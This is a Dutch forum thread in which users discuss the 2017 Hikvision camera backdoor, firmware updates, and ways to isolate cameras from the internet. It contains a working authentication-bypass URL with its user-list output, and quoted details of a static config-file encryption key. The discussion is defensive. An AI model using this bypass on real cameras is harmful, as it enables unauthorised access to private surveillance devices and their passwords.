Backdoor in Hikvision cameras?

[Briolet]

Op security.nl kwam ik vandaag een stuk tegen waarin beweerd werd dat Hikvision een Backdoor bevatte. Met een update in maart 2017 zou dit verholpen zijn. Maar update iedereen zijn camera software steeds?

Ik heb die update indertijd maar op een deel van mijn cameras kunnen isstalleren. De andere cameras gaven een foutmelding bij updatepogingen.

Ik heb zelf even gekeken. De cameras die ik niet heb kunnen updaten geven alle accounts op de camera weer als ik http://camera.ip/Security/users?auth=YWRtaW46MTEK intik

Code: [Selecteer]

<UserList xmlns="http://www.hikvision.com/ver10/XMLSchema" version="1.0">
<User xmlns="http://www.hikvision.com/ver10/XMLSchema" version="1.0">
<id>1</id>
<userName>admin</userName>
<priority>high</priority>
<ipAddress>0.0.0.0</ipAddress>
<macAddress>00:00:00:00:00:00</macAddress>
<userLevel>Administrator</userLevel>
</User>
<User xmlns="http://www.hikvision.com/ver10/XMLSchema" version="1.0">
<id>2</id>
<userName>Briolet</userName>
<priority>low</priority>
<ipAddress>0.0.0.0</ipAddress>
<macAddress>00:00:00:00:00:00</macAddress>
<userLevel>Operator</userLevel>
</User>
</UserList>
Bij de camera die wel de update heeft geaccepteerd, krijg ik een login venster bij die url.

Dat soort bugs/backdoors is een goede reden om IP cameras nooit rechtstreeks vanaf het internet benaderbaar te maken. Beter indirect via SS.

[Briolet]

Het ergste is dat je ook de configuratiefile kunt downloaden. Volgens de auteur staan daar de wachtwoorden ook in, in plain tekst. Ik krijg die confuguratiefile ook, maar vind mijn wachtwoord niet zo. Een kenner kan hem er wel zo uithalen.

Configuration backup files, unfortunately, contain usernames and plain-text passwords for all configured users. While
the files are encrypted, the encryption is easily reversible, because Hikvision chose to use a static encryption key,
which is derived from the password "abcdefg". Other Hikvision products have similarly weak encryption mechanisms.

[Hofstede]

Eén van de redenen waarom mijn camera's tegenwoordig op een apart camera VLAN zitten. Komt men er al in, dan kunnen ze hooguit de andere camera's benaderen.

[Briolet]

Eindelijk is de update van al mijn cameras dan wel gelukt.

De updates kun je hier ophalen.

Ik heb 3 verschillende modellen die allen dezelfde firmware versie gebruiken. Toen de update een half jaar geleden uit kwam ben ik ook al aan het updaten gegaan, maar dat lukte toen maar bij 1 camera. Bij alle andere kreeg ik steeds:



Uiteindelijk heb ik het toen opgegeven omdat ik ook niet wist wat er verbeterd was. Ik gaf de schuld aan de firmware die misschien toch niet compatibel was met de andere modellen. Ik zag echter ook nooit nieuwere firmware verschijnen.

Deze week bleef de foutmelding terug komen. Ik deed nu nog een poging vanaf een desktop i.p.v. mijn laptop. Nu werkte de update bij 2 van de 3 cameras wel direct.
Bij de laatste heb ik de update nog een paar keer geprobeerd totdat hij wel begon.

Blijkbaar is het toch iets met de verbinding richting camera wat de upload van de firmware verstoort.

[Briolet]

Omdat het uitbuiten van de backdoor misschien toch nog te moeilijk is voor de niet-technische mensen, heeft bp2008 een programmaatje geschreven die het werk voor je doet. Dit programma staat op GitHub.

Bp2008 brengt het wat positiever: een tool die helpt bij 'vergeten' wachtwoorden.

Nu inbreken zo laagdrempelig is, kun je er op wachten dat de Cameras via zoekmachines als Shodan opgezocht worden en het eigenlijk zeker is dat een niet ge-update camera dia aan het internet hangt, gecompromitteerd gaat worden.

[fishke]

Dit is een oud topic, maar ik heb hier een vraag over.

Bij mijn camera's laat ik het vakje gateway leeg. Dit betekend eigenlijk toch kort door de bocht dat mijn camera zelf niet kan internetten. Als ik geen forwards doe richting de camera's, dan is het toch niet mogelijk om bij mijn camera's te komen? In mijn firewall heb ik ook de interne IP's geblokkeerd staan. Moet ik me dan druk maken? Wat kan ik evt nog doen?

[Briolet]

Als je de gateway leeg laat, weet je nooit zeker of hij zelf op zoek gaat. Ik zou daar dan expliciet een foute gateway invullen.

Denk er ook aan dat je dan als tijdserver het adres van de nas moet gebruiken. (En niet een externe tijdserver)  Verder lijkt het me te kloppen. Er is geen noodzaak dat hij zelf het internet op gaat. (Ze hebben geen automatische update functie)

[fishke]

Ik heb zojuist de gateway even foutief in gevuld.

Gelijk even naar de NTP server gekeken. Deze had ik blijkbaar ook al op mijn NAS ip ingesteld.

Bedankt voor je reactie Briolet